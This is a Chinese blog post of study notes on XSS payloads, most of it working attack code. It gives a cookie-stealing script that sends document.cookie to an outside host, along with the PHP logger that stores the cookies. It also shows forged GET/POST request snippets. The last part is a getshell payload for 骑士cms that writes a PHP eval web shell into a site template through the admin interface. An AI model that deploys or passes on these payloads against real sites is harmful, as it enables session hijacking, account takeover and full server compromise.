xss payload - milantgh

xss payload可以使用富客户端文本书写，大多数用javascript，少部分用actionscript等等。

1.盗取cookie，发起cookie劫持

使用xss漏洞插入cookie.js

cookie.js代码：

1
var img = document.createElement("img");

2
 
3
img.src = "http://lanu.sinaapp.com/cookie.php?cookie="+escape(document.cookie);

4
 
5
document.body.appendChild(img);

cookie.php代码

1
<?php

2
 
3
    $file = fopen("cookie.txt","a");

4
 
5
    fwrite($file,$_GET['cookie']);

6
 
7
    fclose($file);

8
 
9
?>

2.构造GET和POST请求

get.js代码：

1
var img = document.createElement("img");

2
 
3
img.src = "一个可以使用的get请求链接";

4
 
5
document.body.appendChild(img);

post.js代码：

代码1：(DOM节点方式)

01
var f = document.createElement("form");

02
 
03
f.action ="";

04
 
05
f.method = "post";

06
 
07
document.body.appendChild(f);

08
 
09
var i1 = document.createElement("input");

10
 
11
i1.name = "xxx";

12
 
13
i1.value = "xxxx";

14
 
15
f.appendChild(i1);

16
 
17
var i2 = document.createElement("input");

18
 
19
i2.name = "aaa";

20
 
21
i2.value = "aaa";

22
 
23
f.appendChild(i2);

24
 
25
f.submit();

代码2：

1
var dd = document.createElement("div");

2
 
3
document.body.appendChild(dd);

4
 
5
dd.innerHTML ='<form action="" method="post" id="xssform" name="mbform">'+'<input type="hidden" value="xxxx" name="xxx" />'+'<input type="text" value="aaaa" name="aaa" />'+'</form>';

6
 
7
document.getElementById("xssform").submit();

代码3：(使用XMLHttpRequest)

01
var url = "http://lanu.sinaapp.com";

02
 
03
var postStr = "aaa=aaaa&xxx=xxxx";

04
 
05
var ajax = null;

06
 
07
if(window.XMLHttpRequest)

08
 
09
{

10
 
11
    ajax = new XMLHttpRequest();

12
 
13
}

14
 
15
else if(window.ActiveXObject)

16
 
17
{

18
 
19
    ajax = new ActiveXObject("Microsoft.XMLHTTP");//ie6和一下老版本

20
 
21
}

22
 
23
else

24
 
25
{

26
 
27
    return;

28
 
29
}

30
 
31
ajax.open("POST", url , true);

32
 
33
ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");

34
 
35
ajax.send(postStr);

36
 
37
//ajax.open("GET", url, true);

38
 
39
//ajax.send(null);

40
 
41
ajax.onreadystatechange = function()

42
 
43
{

44
 
45
    if(ajax.readyState == 4 && ajax.status == 200)

46
 
47
    {

48
 
49
        //alert("Done!");

50
 
51
    }

52
 
53
}

-------------------

3.xss钓鱼

4.浏览器识别和用户安装软件识别

http://www.thespanner.co.uk/2009/01/29/detecting-browsers-javascript-hacks/

5.css history hack

http://ha.ckers.org/weird/CSS-history-hack.html

读《白帽子讲web安全》笔记

---------------------

xxs payload getshell 实例：

骑士cms getshell

01
//构造好的能写入一句话的连接

02
 
03
var Shelldata='tpl_content=%3C%3Fphp%20eval%28%24_POST%5Bxdxd%5D%29%3F%3E&tpl_dir=default&tpl_name=footer.php&del_Submit=%B1%A3%B4%E6';

04
 
05
try

06
 
07
{ 

08
 
09
//调用XMLHttpRequest

10
    var xml = window.XMLHttpRequest ? (new XMLHttpRequest()) : (new ActiveXObject('Microsoft.XMLHTTP')); 

11
 
12
    xml.open("POST",'admin_templates.php?act=do_edit',false);

13
    xml.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); 

14
    xml.onreadystatechange = function()

15
    {

16
        if(xml.readyState == 4)

17
 
18
        {

19
 
20
        }

21
    }

22
    xml.send(Shelldata); 

23
}

24
catch(e)

25
 
26
{

27
 
28
}

posted on 2015-01-22 11:47 milantgh 阅读(681) 评论(0) 编辑收藏举报

刷新页面返回顶部